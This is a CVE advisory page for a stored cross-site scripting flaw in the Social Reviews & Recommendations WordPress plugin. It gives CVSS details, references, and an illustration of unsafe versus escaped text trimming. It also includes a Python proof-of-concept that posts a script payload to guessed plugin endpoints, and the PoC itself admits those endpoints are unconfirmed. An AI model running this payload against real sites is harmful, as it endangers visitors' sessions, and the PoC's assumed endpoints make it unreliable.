Security Vulnerability Report

CVE-2025-12705

Published: 2025-12-09 16:17:35
Last Modified: 2026-04-15 00:35:42

Description

The Social Reviews & Recommendations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the 'trim_text' function in all versions up to, and including, 2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.5.
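The bug class named above (a text-trimming helper that truncates review text and hands it to the template without escaping) is easy to get wrong even when fixing it, because escaping and truncation do not commute: escape first and a later truncation can split an entity such as `&amp;`. The following is an added illustration written for this page, in the same language as the PoC below, not code from the fb-reviews-widget plugin; the plugin's real trim_text() in includes/class-view.php is referenced but not reproduced here, and the sample review text is constructed. In a WordPress plugin the escaping step corresponds to esc_html() (or wp_kses_post() when limited markup is intended) applied at output time.

```python
import html

# Constructed sample: review text as an attacker might submit it to a review
# source that the widget later renders. Everything after "great " is hostile.
SAMPLE_REVIEW = (
    "Fish & chips were great "
    "<script>alert(document.cookie)</script> see you soon"
)


def truncate(text: str, limit: int) -> str:
    """Shared truncation rule: cut at `limit` characters and mark the cut."""
    if len(text) <= limit:
        return text
    return text[:limit].rstrip() + "..."


def trim_text_unsafe(text: str, limit: int) -> str:
    """Vulnerable pattern (CWE-79): the trimmed string is returned as-is and
    the template echoes it, so any tag inside the first `limit` characters
    reaches the browser intact."""
    return truncate(text, limit)


def trim_text_escape_then_trim(text: str, limit: int) -> str:
    """Tempting but wrong fix: escaping before truncation means the cut can
    land inside an entity, producing broken output such as 'Fish &am...'."""
    return truncate(html.escape(text, quote=True), limit)


def trim_text_safe(text: str, limit: int) -> str:
    """Hardened pattern: truncate the raw text, then escape the result once,
    at the point where it is emitted into HTML."""
    return html.escape(truncate(text, limit), quote=True)


def contains_raw_markup(rendered: str) -> bool:
    """Tester's check on rendered output: does any unescaped '<' or '>' survive?
    Escaped output can only contain '&lt;' / '&gt;'."""
    return "<" in rendered or ">" in rendered


if __name__ == "__main__":
    for name, fn in [
        ("unsafe", trim_text_unsafe),
        ("escape-then-trim", trim_text_escape_then_trim),
        ("safe", trim_text_safe),
    ]:
        out = fn(SAMPLE_REVIEW, 70)
        print(f"{name:17s} raw markup survives: {contains_raw_markup(out)}")
        print(f"{'':17s} {out}")
```

Run with a limit that falls inside the `<script>` element and the unsafe variant still emits the opening tag, which is enough for most browsers to execute whatever was kept; the safe variant emits `&lt;script&gt;...` which renders as literal text.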

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

The NVD record carries no CPE configuration data. The affected product, as stated in the description, is:

Social Reviews & Recommendations plugin for WordPress <= 2.5 (WordPress.org plugin slug fb-reviews-widget, per the referenced Trac URLs)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# CVE-2025-12705 PoC - Stored XSS in Social Reviews plugin
# Target: WordPress site with vulnerable Social Reviews plugin (<=2.5)
#
# Caveat: the advisory references locate the flaw in trim_text() in
# includes/class-view.php (a rendering path) and do not describe how
# attacker-controlled text reaches it. The endpoint, action name and
# parameter names below are NOT confirmed by those references; they are
# placeholders that must be verified against the installed plugin.
target_url = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "http://target-wordpress-site.com"

# XSS payload targeting trim_text function parameters. Use a marker that is
# unlikely to appear in legitimate content so verification is unambiguous.
xss_payload = "<script>alert(document.cookie)</script>"


def exploit_stored_xss():
    """
    Demonstrates how an unauthenticated attacker might inject JavaScript
    through the plugin's vulnerable parameters. The endpoints and field
    names are assumptions; adjust them after inspecting the plugin.
    """
    # Candidate endpoints (assumed; the REST route in particular is a guess)
    endpoints = [
        f"{target_url}/wp-admin/admin-ajax.php",
        f"{target_url}/wp-json/wp/v2/reviews",
    ]

    # Payload data intended to reach trim_text(). The actual parameter
    # names depend on the plugin version and are not given by the advisory.
    exploit_data = {
        "action": "fb_reviews_save_review",
        "trim_text": xss_payload,
        "review_text": xss_payload,
        "source": "facebook",
    }

    for endpoint in endpoints:
        try:
            response = requests.post(endpoint, data=exploit_data, timeout=10)
            print(f"[*] Sent payload to {endpoint}")
            print(f"[*] Response status: {response.status_code}")
        except requests.RequestException as e:
            print(f"[!] Request failed: {e}")


def verify_stored(page_url):
    """
    Fetch a page that renders the widget and report whether the payload
    comes back unescaped (stored XSS) or escaped (&lt;script&gt;, not
    exploitable). A 200 on the POST above proves nothing by itself.
    """
    try:
        body = requests.get(page_url, timeout=10).text
    except requests.RequestException as e:
        print(f"[!] Verification request failed: {e}")
        return False
    if xss_payload in body:
        print(f"[+] Payload reflected unescaped on {page_url}")
        return True
    print(f"[-] Payload not found unescaped on {page_url}")
    return False


if __name__ == "__main__":
    print("CVE-2025-12705 Social Reviews XSS PoC")
    exploit_stored_xss()
    # Page that displays the reviews widget (assumed path; adjust per site)
    verify_stored(f"{target_url}/")

References

Vulnerable code (CNA references into the plugin's trunk):
https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L447
https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L449
https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L452

Fix changesets on WordPress.org:
https://plugins.trac.wordpress.org/changeset/3393291/
https://plugins.trac.wordpress.org/changeset/3406362/

Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/6d2aa302-aaab-4bf1-9a79-144290b967de?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12705", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:34.533", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Social Reviews & Recommendations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the 'trim_text' function in all versions up to, and including, 2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L447", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L449", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L452", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3393291/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3406362/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6d2aa302-aaab-4bf1-9a79-144290b967de?source=cve", "source": "[email protected]"}]}}